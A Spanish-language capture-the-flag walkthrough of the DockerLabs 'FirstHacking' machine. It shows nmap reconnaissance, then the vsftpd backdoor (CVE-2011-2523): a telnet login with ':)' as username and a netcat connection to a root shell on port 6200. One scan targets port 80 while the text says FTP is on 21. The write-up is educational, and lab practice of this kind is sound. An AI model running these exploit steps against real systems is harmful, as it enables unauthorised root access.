FirstHacking
This content is not available in your language yet.
Introducción
Sección titulada «Introducción»En este artículo explico cómo resolví el CTF de la máquina virtual FirstHacking. A lo largo del texto, detallo paso a paso las técnicas y herramientas utilizadas para identificar y explotar sus vulnerabilidades.
Información de la Máquina Virtual
Sección titulada «Información de la Máquina Virtual»- Nombre: FirstHacking
- Autor: El Pingüino de Mario
- Nivel de Dificultad: Muy fácil
- Fecha de creación: 14/06/2024
Paso 0: Instalación y Despliegue
Sección titulada «Paso 0: Instalación y Despliegue»-
Descargamos la máquina desde DockerLabs.
-
Descomprimimos el archivo:
Ventana de terminal unzip FirstHacking.zip -
Ejecutamos el script de despliegue:
Ventana de terminal sudo bash auto_deplo.sh FirstHacking.tar
Paso 1: Reconocimiento
Sección titulada «Paso 1: Reconocimiento»Escaneo de Red
Sección titulada «Escaneo de Red»Al iniciar la máquina, se nos proporciona directamente su dirección IP, por lo que no fue necesario realizar un escaneo ARP.

Creamos una carpeta para el proyecto y utilizamos la función mkt que genera automáticamente cuatro subdirectorios: content, exploits, nmap y scripts.
mkdir FirstHackingcd FirstHackingmktEscaneo de Puertos
Sección titulada «Escaneo de Puertos»Realizamos un escaneo completo de puertos:
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPortsExtraemos los puertos abiertos:
extractPorts allPorts
Luego, escaneamos los servicios identificados:
nmap -sCV -p80 172.17.0.2 -oN targeted
Enumeración de Servicios
Sección titulada «Enumeración de Servicios»Identificamos el servicio FTP activo en el puerto 21. Procedemos a escanearlo en busca de vulnerabilidades conocidas:
nmap -p21 --script vuln 172.17.0.2El escaneo revela una backdoor explotable: CVE-2011-2523.
Paso 2: Explotación
Sección titulada «Paso 2: Explotación»La vulnerabilidad CVE-2011-2523 permite una ejecución remota de comandos (RCE). Al conectarse al servicio FTP y proporcionar :) como nombre de usuario, se activa una shell de administración en el puerto 6200.
Conexión al FTP por telnet:
telnet 172.17.0.2Usuario:
:)

Conexión a la shell abierta en el puerto 6200 con Netcat:
nc -v 172.17.0.2 6200Elevación de Privilegios
Sección titulada «Elevación de Privilegios»No fue necesario realizar ninguna técnica de escalada de privilegios, ya que la shell obtenida se ejecuta directamente como usuario root.

Notas Finales
Sección titulada «Notas Finales»- La máquina cumple con su objetivo como ejercicio introductorio, siendo de dificultad muy baja.
- Ideal para familiarizarse con vulnerabilidades clásicas en servicios FTP y el uso de Netcat.